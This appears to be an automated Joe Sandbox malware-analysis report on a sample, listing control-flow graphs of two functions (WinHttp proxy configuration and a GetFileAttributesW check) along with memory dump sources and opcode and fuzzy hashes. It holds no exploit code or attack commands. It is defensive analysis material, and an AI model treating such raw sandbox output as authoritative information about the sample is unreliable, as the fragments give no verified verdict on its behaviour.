                                        control_flow_graph 6564 7ff72f5d1f30-7ff72f5d1fd3 call 7ff72f5d64f0 WinHttpGetProxyForUrl 6567 7ff72f5d1fd5-7ff72f5d1fec 6564->6567 6568 7ff72f5d200c-7ff72f5d200e 6564->6568 6569 7ff72f5d1fee-7ff72f5d2001 6567->6569 6570 7ff72f5d2007 call 7ff72f672ea4 6567->6570 6571 7ff72f5d2014-7ff72f5d204c 6568->6571 6572 7ff72f5d21f7-7ff72f5d2216 6568->6572 6569->6570 6573 7ff72f5d2223-7ff72f5d2228 call 7ff72f6a2588 6569->6573 6570->6568 6575 7ff72f5d2050-7ff72f5d2058 6571->6575 6580 7ff72f5d2229-7ff72f5d228b call 7ff72f6a2588 WinHttpGetIEProxyConfigForCurrentUser 6573->6580 6575->6575 6577 7ff72f5d205a-7ff72f5d20be call 7ff72f5c86f0 call 7ff72f5d5ed0 call 7ff72f5d8130 6575->6577 6593 7ff72f5d2115-7ff72f5d2128 call 7ff72f5d1180 6577->6593 6594 7ff72f5d20c0-7ff72f5d20c3 6577->6594 6588 7ff72f5d2450-7ff72f5d2463 6580->6588 6589 7ff72f5d2291-7ff72f5d229e 6580->6589 6591 7ff72f5d22a0-7ff72f5d22c3 6589->6591 6592 7ff72f5d22c9-7ff72f5d22d4 6589->6592 6591->6592 6596 7ff72f5d23d3-7ff72f5d23db 6592->6596 6597 7ff72f5d22da-7ff72f5d2364 call 7ff72f5d64f0 WinHttpGetProxyForUrl 6592->6597 6606 7ff72f5d2162-7ff72f5d216b 6593->6606 6607 7ff72f5d212a-7ff72f5d2141 6593->6607 6598 7ff72f5d20c5-7ff72f5d20db call 7ff72f5d64f0 6594->6598 6599 7ff72f5d20dd-7ff72f5d20f4 call 7ff72f5d7010 6594->6599 6601 7ff72f5d240d-7ff72f5d2413 6596->6601 6602 7ff72f5d23dd-7ff72f5d23eb call 7ff72f5d1f30 6596->6602 6620 7ff72f5d2366-7ff72f5d237d 6597->6620 6621 7ff72f5d239d-7ff72f5d23a0 6597->6621 6622 7ff72f5d20f9-7ff72f5d2113 call 7ff72f5d8130 6598->6622 6599->6622 6601->6588 6609 7ff72f5d2415-7ff72f5d242f WinHttpSetOption 6601->6609 6615 7ff72f5d23f0-7ff72f5d2403 6602->6615 6618 7ff72f5d21a0-7ff72f5d21b0 6606->6618 6619 7ff72f5d216d-7ff72f5d2184 6606->6619 6613 7ff72f5d2143-7ff72f5d2156 6607->6613 6614 7ff72f5d215c-7ff72f5d2161 call 7ff72f672ea4 6607->6614 6616 7ff72f5d2431-7ff72f5d244e WinHttpSetOption 6609->6616 6617 7ff72f5d246a-7ff72f5d24ab call 7ff72f5c82c0 GetLastError call 7ff72f5d1380 call 7ff72f692ab4 6609->6617 6613->6580 6613->6614 6614->6606 6615->6601 6616->6588 6624 7ff72f5d24ac-7ff72f5d24ef call 7ff72f5c82c0 GetLastError call 7ff72f5d1380 call 7ff72f692ab4 6616->6624 6617->6624 6630 7ff72f5d21b5-7ff72f5d21d2 call 7ff72f5d76d0 6618->6630 6631 7ff72f5d21b2 6618->6631 6625 7ff72f5d2186-7ff72f5d2199 6619->6625 6626 7ff72f5d219b call 7ff72f672ea4 6619->6626 6627 7ff72f5d237f-7ff72f5d2392 6620->6627 6628 7ff72f5d2398 call 7ff72f672ea4 6620->6628 6633 7ff72f5d23a2-7ff72f5d23b8 6621->6633 6634 7ff72f5d23ba 6621->6634 6622->6593 6622->6594 6625->6626 6639 7ff72f5d2217-7ff72f5d221c call 7ff72f6a2588 6625->6639 6626->6618 6627->6628 6641 7ff72f5d2464-7ff72f5d2469 call 7ff72f6a2588 6627->6641 6628->6621 6651 7ff72f5d21d4-7ff72f5d21e7 6630->6651 6652 7ff72f5d21ec-7ff72f5d21f2 call 7ff72f672ea4 6630->6652 6631->6630 6636 7ff72f5d23c3-7ff72f5d23cd 6633->6636 6634->6636 6636->6596 6657 7ff72f5d221d-7ff72f5d2222 call 7ff72f6a2588 6639->6657 6641->6617 6651->6657 6658 7ff72f5d21e9 6651->6658 6652->6572 6657->6573 6658->6652
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$HttpProxy$ConfigCurrentUser
                                        • String ID: Error (WinHttpSetOption)$Error (WinHttpSetOption)
                                        • API String ID: 151569862-2338077917
                                        • Opcode ID: 4bbd54a0064872421c0b17b59afbda93a7c32443171410c2743db2ee95a97a07
                                        • Instruction ID: 5d43be29eca884c0dc5b8cc880ae4055819a74a320e27160f36329bd0b65902e
                                        • Opcode Fuzzy Hash: 4bbd54a0064872421c0b17b59afbda93a7c32443171410c2743db2ee95a97a07
                                        • Instruction Fuzzy Hash: A2F1B422B19BC181EB10DF65E8443EEE365FB84794F909232EA9D43A99DF7CD185CB10

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 6793 7ff72f664fd0-7ff72f664fe0 GetFileAttributesW 6794 7ff72f664ff0-7ff72f664ff6 6793->6794 6795 7ff72f664fe2-7ff72f664fe4 6793->6795 6795->6794 6796 7ff72f664fe6-7ff72f664fef 6795->6796
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 2a0f04c386ea1cea411b0b338e985f6a00596f83678c51350d66cb6874578e50
                                        • Instruction ID: 22750c79263fa4062031f8975c3f943a8b5a3ad97d81f9b7b7c68fdb0d0d428c
                                        • Opcode Fuzzy Hash: 2a0f04c386ea1cea411b0b338e985f6a00596f83678c51350d66cb6874578e50
                                        • Instruction Fuzzy Hash: 86C01264F0658246EA5836292E852B44256FBD6365FD00630D55C916D4E96C58DB4F10